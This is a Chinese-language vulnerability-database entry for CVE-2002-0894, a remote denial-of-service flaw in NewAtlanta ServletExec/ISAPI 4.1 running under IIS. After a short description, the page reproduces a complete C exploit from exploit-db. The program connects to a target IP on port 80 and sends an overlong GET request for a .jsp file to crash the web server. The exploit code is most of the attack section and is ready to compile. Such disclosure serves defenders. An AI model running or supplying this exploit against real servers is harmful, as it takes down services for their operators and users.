NewAtlanta ServletExec/ISAPI JSPServlet远程拒绝服务攻击漏洞

NewAtlanta ServletExec/ISAPI JSPServlet远程拒绝服务攻击漏洞

漏洞ID 1106737 漏洞类型 其他
发布时间 2002-05-22 更新时间 2005-10-20
图片[1]-NewAtlanta ServletExec/ISAPI JSPServlet远程拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2002-0894
图片[2]-NewAtlanta ServletExec/ISAPI JSPServlet远程拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200210-011
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21471
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-011
|漏洞详情
ServletExec/ISAPI是一款运行在MicrosoftIISWEB平台下的JavaServlet/JSP引擎插件,可使用在MicrosoftWindowsNT/2000/XP系统下的IISWEB服务程序中。ServletExec/ISAPI对用户提交的特殊URL请求没有正确处理,可导致远程攻击者进行拒绝服务攻击。远程攻击者可以通过直接请求超长文件名的.jsp文件,或者直接调用JSPServlet及JSP10Servlet,就可以导致IIS崩溃,造成拒绝服务攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/4796/info

ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS. It runs with IIS on Microsoft Windows NT/2000/XP systems.

A denial of service condition occurs when the JSPServlet is sent an overly long request either directly or via a request for a JSP file.

It has been reported that this will cause the underlying webserver to crash.

This condition may be the result of insufficient bounds checking, though this possibility has not been confirmed. 

#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>

/*    This is Exploit code for a vulnerability in NewAtlanta ServletExec ISAPI 4.1.
      ServletExec 4.1 ISAPI is a Java Servlet/JSP Engine for Internet Information
      Server and is implemented as an ISAPI filter.
      Machines running this program is MS IIS server 4 and 5.
	  This code can simple crash the server, successfully preform a DoS attack!
	  It sends a string that servletExec don't like but have to eat, and 
	  this will make the server crash, BIG TIME =)
	  This file assuming the www server is on port 80 and that the servlet engine
	  is located in the /Servlet directory. 
	  Jonas "bl0wfi5h" Nyberg and Digital-Root.com is proud to present ServletExecCrash.
	  You can contact me at: [email protected] or [email protected].
	  This was finished: 2002-05-24 @21:49 Swedish time
*/

void banner(void);

typedef unsigned short int USHORT;
typedef unsigned long int ULONG;



int main(int argc, char** argv[])
{
  int sockfd;
  struct sockaddr_in dest_addr;

  
  int len, bytes_sent, select;
  char* string = "GET /Servlet/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jsp";
 
  if(argc < 2 || argc > 2)
  {
  	printf("Usage: ./servletExecCrash ipn");
  	printf("Assuming that its port 80, which is default for most www serversn");
  	printf("If this is a case where this is not true, change the got damn source yourself!n");
  	exit(1);
  }
  dest_addr.sin_family = AF_INET;
  dest_addr.sin_port = htons(80);
  inet_aton(argv[1], &(dest_addr.sin_addr));
  memset(&(dest_addr.sin_zero), '',8);
  len = strlen(string);
  
  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) 
  {
  	printf("problem with your socket!");
  	exit(1);
  }
  
  connect(sockfd, (struct sockaddr *)& dest_addr, sizeof(struct sockaddr));
  
 	
  bytes_sent = send(sockfd, string, len, 0);	
  if(bytes_sent == -1)
  {
    printf("nYou are having problem sending, the informationn");
    exit(1);
  }
	printf("nYou have sent: %d", bytes_sent);
	printf(" bytes to: %s", argv[1]);
	close(sockfd);	
	banner();
	return 0;

}
void banner(void)
{
	printf("nn***********************************************n");
	printf("*****CODE MADE BY: JONAS [BL0wFi5h] NYBERG*******n");
	printf("*********DIGITAL-ROOT PROUDLY PRESENT*************n");
	printf("****************SERVLETEXECCRASH******************n");
	printf("**************************************************n");
	

}
|参考资料

来源:BID
名称:4796
链接:http://www.securityfocus.com/bid/4796
来源:XF
名称:servletexec-long-jsp-dos(9141)
链接:http://www.iss.net/security_center/static/9141.php
来源:BUGTRAQ
名称:20020522MultiplevulnerabilitiesinNewAtlantaServletExecISAPI4.1
链接:http://online.securityfocus.com/archive/1/273615
来源:VULNWATCH
名称:20020522[VulnWatch]MultiplevulnerabilitiesinNewAtlantaServletExecISAPI4.1
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0077.html

相关推荐: SitePanel2 2.6.1 – Multiple Input Validation Vulnerabilities

SitePanel2 2.6.1 – Multiple Input Validation Vulnerabilities 漏洞ID 1055076 漏洞类型 发布时间 2005-05-03 更新时间 2005-05-03 CVE编号 N/A CNNVD-ID …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享